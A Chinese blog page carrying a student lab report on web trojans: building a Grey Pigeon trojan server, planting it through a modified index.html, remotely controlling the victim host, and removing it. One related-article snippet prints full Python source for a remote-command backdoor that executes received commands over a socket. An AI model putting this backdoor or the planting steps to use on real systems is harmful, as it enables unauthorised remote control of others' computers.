【信息安全技术】实验报告:木马及远程控制技术

最新推荐文章于 2023-02-07 19:40:35 发布
最新推荐文章于 2023-02-07 19:40:35 发布
阅读量3.2k 收藏 4
点赞数
文章标签: 操作系统
原文链接:http://www.cnblogs.com/protectmonarch/p/7912153.html
版权

实验目的

  • 剖析网页木马的工作原理
  • 理解木马的植入过程
  • 学会编写简单的网页木马脚本
  • 通过分析监控信息实现手动删除木马

实验内容

  • 木马生成与植入
  • 利用木马实现远程控制
  • 木马的删除

实验过程

主机A

  • 通过IIS启动木马网站
  • 启动灰鸽子,生成木马的“服务器程序”,生成界面如图:

  • 1057540-20171128205627362-1616185564.png

  • 编写生成网页木马脚本程序,并将之放入“木马网站”的网站空间目录中

  • 改写index.html,完成“挂马”过程

主机B

  • 设置监控,并启动协议分析器捕捉数据
  • 启动http://172.16.0.97,并等待A的灰鸽子出现“自动上线主机”的字样
  • 查看“进程监控”、“服务监控”、“文件监控”、“端口监控”和协议分析器所捕获到的信息
  • 主机B创建一个.txt文件

主机A

  • 通过灰鸽子修改主机B创建的文件文件名
最低0.47元/天 解锁文章
bameng0081
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
远控木马分析(实习生)
heikezhishi的博客
08-19 857
病毒来源:朋友服务器发现此木马 当时为了提样本搞了很久,一直找恢复文件,对提取样本有研究的朋友还请指导指导。 文件名:vister.exe MD5:30866adc2976704bca0f051b5474a1ee 此处创建了一个进程 申明了一个2800大小的Space.buffer 并将地址mov到5123EA08 导入win32 api创建了文件,继续走。 Loadlibrary加载了msvcrt.dll,获取memcpy的函数地址。 ...
信息安全技术基础:木马的分类.doc
11-01
信息安全技术基础
20155231 20155234 信息安全技术 实验四 木马远程控制技术 实验报告
weixin_30239339的博客
11-29 464
20155231 20155234 信息安全技术 实验四 木马远程控制技术 实验报告 姓名: 邵煜楠 学号: 20155231 日期: 2017.11.21 姓名: 昝昕明 学号: 20155234 日期: 2017.11.21 一、实验环境 操作系统:windows7 实验工具:灰鸽子远程控制、监控器、协议分析器 二、实验内容 木马生成与植入 利用木马实现远程控制 木马的删除 三、实...
信息安全技术》实验四 木马远程控制技术
aezm18818的博客
11-27 1048
信息安全技术》实验四 木马远程控制技术 实验名称 木马远程控制技术 实验目的 剖析网页木马的工作原理 理解木马的植入过程 学会编写简单的网页木马脚本 通过分析监控信息实现手动删除木马 实验人数 本组3人,20155331丹增旦达 20155334 曹翔 20155338 常胜杰 实验内容 木马生成与植入 利用木马实现远程控制 木马的删除 实验环境 系统环境 Windows Serv...
信息安全技术 实验3 木马远程控制技术
djt1999的博客
11-29 1138
信息安全技术 实验3 木马远程控制技术 实验报告 课程: 信息安全技术 班级:1552 姓名:范晨歌、田皓宇 学号:20155226、20155236 指导教师: 李冬冬 实验日期及时间:2017.11.22 15:30-18:00 座位号:36 必修/选修:必修 实验序号:3 实验名称:木马远程控制技术 实验目的 剖析网页木马的工作原理 理解木马的植入过程 学会编写简单的网页...
木马控制技术(三) -- Hook技术
weixin_30528371的博客
08-12 413
此为《木马技术揭秘与防御》系列读书笔记 基本概念 钩子(Hook)是windows消息处理机制的一个平台: Ahookis a mechanism by which an application can intercept events, such as messages, mouse actions, and keystrokes. A function that int...
信息安全技术木马的防御.pptx
11-01
信息安全技术基础
信息安全技术木马变形记.pptx
11-01
信息安全技术基础
信息安全技术木马的工作原理.pptx
11-01
信息安全技术基础
信息安全技术基础:如何防御木马木马攻击.docx
11-01
信息安全技术基础
网络攻防实验报告.pdf
01-07
网络攻防实验报告.pdf
2022年信息安全总结报告
tigerman20201的博客
02-07 209
好的,我替你设计一篇关于2022年信息安全总结报告的文案吧。 2022年信息安全总结报告: 2022年是一个重要的转折点,通过回顾前一年,我们可以看到以下关键信息安全发展: 1、在大数据时代,信息安全问题也方兴未艾,企业对此非常重视; 2、“云”技术也得到了突飞猛进的发展,各企业把握住“云”服务机会,不断拓展信息安全的技术和服务; 3、尤其是5G,通过新兴的5G技术,企业能够更好的掌控信息安全,为网络安全的发展贡献自己的力量; 4、实施人工智能,大大提升了信息安全的弹性,并有利于企业加快信息安全的发展和提高
信息安全技术 实验四 木马远程控制技术
weixin_30950237的博客
11-27 373
信息安全技术 实验四 木马远程控制技术 实 验 报 告 实验名称: 木马远程控制技术 姓名: 杨瀚、李卓雯 学号: 20155313、20155201 班级: 1553、1552 日期: 2017.11.21 一、 实验环境 操作系统:windows 7、VM虚拟机中的windows 2003 实验工具:灰鸽子远程控制、监控器、协议分析器 二、 实验内容 1、木马生成与植...
远程控制---实验十:灰鸽子远控软件使用实验
weixin_70557959的博客
05-06 6705
一、实验目的及要求 1、掌握经典远控木马的原理 2、掌握“灰鸽子”木马的使用方法 二、实验原理 “灰鸽子”是现在网络上非常流行的一种木马,由两部分组成,一是控制端(主程序),一是服务端(也叫受控端)。任一部分都会被主流的杀毒软件查杀,但随着其不断衍生新的变种和一些免杀技巧经常绕过一些主动防御软件,使得用户防不胜防。 灰鸽子客户端和服务端都是采用Delphi编写。黑客利用客户端程序配置出服务端程序。可配置的信息主要包括上线类型(如等待连接还是主动连接)、主动连接时使用的公网IP(域名)、连接密码..
木马远程控制和清除 实验
qq_53397065的博客
12-19 5015
实验4:木马远程控制和清除 实验目的 1. 理解木马的关键技术:包括木马的启动、隐藏和远程控制。 2. 使用一种木马实施远程控制,并进行清除。 二、实验环境 Windows7 x64系统虚拟机;Window XP 系统虚拟机;冰河 V8.4 三、实验原理 , 使用两台虚拟机,一台充当操作机,一台充当被种植木马的目标机,然后使用冰河木马对目标机实行远程控制。 四、实验内容 1.使用一种木马实施远程控制,具体而言,在被攻击者计算机...
网页木马挂马的实现与防范
qq_43678263的博客
12-10 2343
网页木马挂马的实现与防范
灰鸽子--木马、后门实验
mr__sheng的博客
05-28 2852
目录 实验目的 实验要求 实验原理 实验环境 实验步骤 实验目的 1.了解木马攻击的原理。 2. 掌握木马与后门工作机制 3. 掌握木马与后门的防范措施 实验要求 利用灰鸽子客户端配置服务器程序并生成服务端 配置并生成服务器 进行木马植入,通过灰鸽子客户端界面进行远程连接 实验原理 一个完整的特洛伊木马套装程序含了两部分:服务端(服务器部分)和客户端(控制器部分)。植入对方电脑的是服务端,而黑客正是利用客户端进入运行了服...
2017-2018-1 20155216 20155223《信息安全技术》实验四—— 木马远程控制技术
bali9195的博客
11-27 390
2017-2018-1 20155216 20155223《信息安全技术》实验四—— 木马远程控制技术 实验目的 剖析网页木马的工作原理 理解木马的植入过程 学会编写简单的网页木马脚本 通过分析监控信息实现手动删除木马 实验内容 木马的生成与植入 利用木马实现远程操控 木马的删除 实验原理 网页木马 网页木马就是表面上伪装成普通的网页文件或是将恶意的代码直接插入到正常的网页文件中,当...
python远程控制木马
最新发布
09-05
远程控制木马是一种恶意软件,它通过网络连接远程主机,并允许攻击者在目标计算机上执行各种操作和命令。根据提供的引用内容,以下是一个使用Python编写的远程控制木马的示例代码: ```python # 服务端(server)程序 import socket import os def attack(): try: s = socket.socket() s.bind(('0.0.0.0', 6667)) # 使用默认地址,所有设备均可访问该服务器的6667端口 s.listen() # 对6667端口进行监听 channel, client = s.accept() # 进入阻塞状态,accept() 返回元组,接受来自客户端的数据 # channel: 新的socket对象用于标识出服务器和哪个客户端连接进行通信 # client: 客户端的IP和端口 while True: receive = channel.recv(1024).decode() # 接收来自客户端的命令 reply = os.popen(receive).read() # 执行命令,并获取执行结果 channel.send(f"命令{receive}的运行结果:\n{reply}".encode()) # 将结果发送回客户端 except: s.close() if __name__ == '__main__': attack() # 客户端(client)程序 import socket s = socket.socket() s.connect(('192.168.137.1', 6667)) # 192.168.137.1是socket服务器的地址 while True: sendstr = input("请输入消息:") s.send(sendstr.encode()) # 将命令发送给服务器 receive = s.recv(1024).decode() # 接收服务器的回复 print(f"服务器回复:{receive}") ``` 请注意,远程控制木马是一种非法行为,严重侵犯他人隐私和安全。在进行任何网络活动时,请始终遵守法律和道德规范。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [基于Python实现socket远程木马](https://blog.csdn.net/weixin_49472648/article/details/125308268)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值